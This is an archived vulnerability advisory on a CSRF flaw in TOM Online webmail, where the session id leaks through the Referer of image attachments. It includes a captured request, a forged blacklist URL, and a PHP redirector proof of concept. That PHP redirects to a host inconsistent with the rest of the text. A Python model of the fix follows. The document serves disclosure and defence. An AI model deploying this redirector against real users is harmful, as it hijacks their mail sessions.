TOM Online web mail has multiple CSRF vulnerabilities, with fix - vulnerability warning - Black Bar Safety Net (myhack58)

2012-04-12T00:00:00
ID MYHACK58:62201233642
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-04-12T00:00:00

Description

When a message contains an image attachment, the browser's request for that image carries the current web mail URL in the Referer header, and that URL contains the session identifier (sid). Any host serving the image therefore receives the victim's sid. Example of such a request:

GET /mblogpic/be654a34c8f4aad1ec6a/2000 HTTP/1.1
Host: t100.qpic.cn
Connection: keep-alive
Cache-Control: max-age=0
If-Modified-Since: Mon, 06 Apr 2012 14:00:09 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19
Accept: */*
Referer: http://bjapp6.mail.tom.com/coremail/fcg/ldmsapp?funcid=readlett&sid=nAJcHTFziYRAMbTs&mid=1tbiEwEkBkV9AdrAoQAAsy%0A19%0A24%0A1&fid=1&ord=0&desc=1&start=0&fromsearch=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
DNT: 1

An attacker can send a message whose image attachment points at a server under their control. That server reads the sid out of the Referer and answers with a redirect to a state-changing web mail URL carrying the stolen sid; the victim's browser follows the redirect and the action is performed in the victim's session. For example, to add test@test.com to the blacklist, the redirect target is:

http://bjapp6.mail.tom.com/cgi/ldapapp?sid=nAJcHTFziYRAMbTs&tempname=options%2Frefuselist.htm&funcid=opuserattr&optype=set&refuselist=test%40test.com&update.x=1

Because the operation is performed with a plain GET and the sid is the only authentication, this is enough to complete the CSRF attack.

Proof of concept:

Test code (the attacker-side script that serves as the "image"):

<?php
// Attacker-side redirector, served at the URL used as the image attachment.
// The victim's browser sends the web mail URL, including the sid, as the Referer.
$url = parse_url($_SERVER['HTTP_REFERER'] ?? '');
$host = $url['host'] ?? '';
// Extract the sid from the Referer query string.
parse_str($url['query'] ?? '', $params);
$sid = $params['sid'] ?? '';
// Redirect the browser to the state-changing URL with the stolen sid filled in.
$loc = "http://www.badguest.cn/cgi/ldapapp?sid=$sid&tempname=options%2Frefuselist.htm&funcid=opuserattr&optype=set&refuselist=test%40test.com&update.x=1";
header("Location: $loc");
?>

Fix:

Do not expose the sid in the URL, so that it cannot leak through the Referer header, and do not allow state-changing operations to be performed with a GET request.
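As an added illustration of the attack chain and of this fix (example code written for this page, not TOM Online's code), the Python below models two hypothetical handlers for the opuserattr request: one that behaves like the original (sid in the query string, state changed on GET) and one applying the fix. Moving the sid out of the URL stops the Referer leak, and refusing GET defeats the redirect trick, but a browser still attaches the session cookie to a forged POST that an attacker auto-submits from a form, so the hardened handler also requires a token bound to the session; that token check is an addition beyond the fix stated on the page. The class names, the cookie name, the server secret and the sample Referer string (copied from the request above) are assumptions for the example.

```python
import hmac
import hashlib
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the Referer value from the leaked request above.
LEAKED_REFERER = ("http://bjapp6.mail.tom.com/coremail/fcg/ldmsapp?funcid=readlett"
                  "&sid=nAJcHTFziYRAMbTs&mid=1tbiEwEkBkV9AdrAoQAAsy%0A19%0A24%0A1"
                  "&fid=1&ord=0&desc=1&start=0&fromsearch=1")


def sid_from_referer(referer):
    """What the attacker's image host does: pull sid out of the Referer query string."""
    return parse_qs(urlsplit(referer).query).get("sid", [None])[0]


def forged_url(sid):
    """The redirect target from the advisory, with the stolen sid filled in."""
    return (f"http://bjapp6.mail.tom.com/cgi/ldapapp?sid={sid}&tempname=options%2Frefuselist.htm"
            "&funcid=opuserattr&optype=set&refuselist=test%40test.com&update.x=1")


class VulnerableMailbox:
    """Hypothetical model of the original behaviour: sid lives in the URL and a GET mutates state."""

    def __init__(self, sid):
        self.sessions = {sid: {"refuselist": []}}

    def handle(self, method, url, cookies=None, body=None):
        q = parse_qs(urlsplit(url).query)
        sid = q.get("sid", [None])[0]          # session taken from the query string
        if sid not in self.sessions:
            return 403
        if q.get("funcid") == ["opuserattr"] and q.get("optype") == ["set"]:
            self.sessions[sid]["refuselist"].append(q["refuselist"][0])
            return 200                          # state changed on a plain GET
        return 404


class HardenedMailbox:
    """Hypothetical fix: sid only in a cookie, mutations only via POST with a session-bound token."""

    def __init__(self, sid, secret):
        self.sessions = {sid: {"refuselist": []}}
        self.secret = secret

    def csrf_token(self, sid):
        # Derived from the server secret and the session, so it cannot be guessed
        # from the sid alone or replayed against another session.
        return hmac.new(self.secret, sid.encode(), hashlib.sha256).hexdigest()

    def handle(self, method, url, cookies=None, body=None):
        sid = (cookies or {}).get("sid")        # never read from the URL, so the Referer cannot leak it
        if sid not in self.sessions:
            return 403
        q = parse_qs(urlsplit(url).query)
        if q.get("funcid") == ["opuserattr"]:
            if method != "POST":
                return 405                      # the page's fix: no state change on GET
            form = parse_qs(body or "")
            token = form.get("csrf", [""])[0]
            if not hmac.compare_digest(token, self.csrf_token(sid)):
                return 403                      # forged POST without the token is rejected
            self.sessions[sid]["refuselist"].append(form.get("refuselist", [""])[0])
            return 200
        return 404


def run_attack():
    """Replay the advisory's attack against both models; returns status codes and resulting blacklists."""
    sid = sid_from_referer(LEAKED_REFERER)
    url = forged_url(sid)

    vuln = VulnerableMailbox(sid)
    vuln_status = vuln.handle("GET", url)   # browser follows the redirect; sid in the URL suffices

    hard = HardenedMailbox(sid, b"server-side secret")
    browser_cookies = {"sid": sid}           # the browser still attaches the cookie on a forged request
    get_status = hard.handle("GET", url, cookies=browser_cookies)
    post_status = hard.handle("POST", url, cookies=browser_cookies,
                              body="refuselist=test%40test.com")   # attacker's auto-submitted form, no token
    legit_status = hard.handle("POST", url, cookies=browser_cookies,
                               body=f"refuselist=spam%40example.com&csrf={hard.csrf_token(sid)}")
    return {
        "sid": sid,
        "vulnerable": (vuln_status, vuln.sessions[sid]["refuselist"]),
        "hardened": (get_status, post_status, legit_status, hard.sessions[sid]["refuselist"]),
    }


if __name__ == "__main__":
    print(run_attack())
```

Running the script shows the forged GET succeeding against the vulnerable model (the blacklist gains test@test.com), while against the hardened model the redirect's GET is refused, a forged POST without the token is refused, and only the legitimate POST carrying the session-bound token changes state.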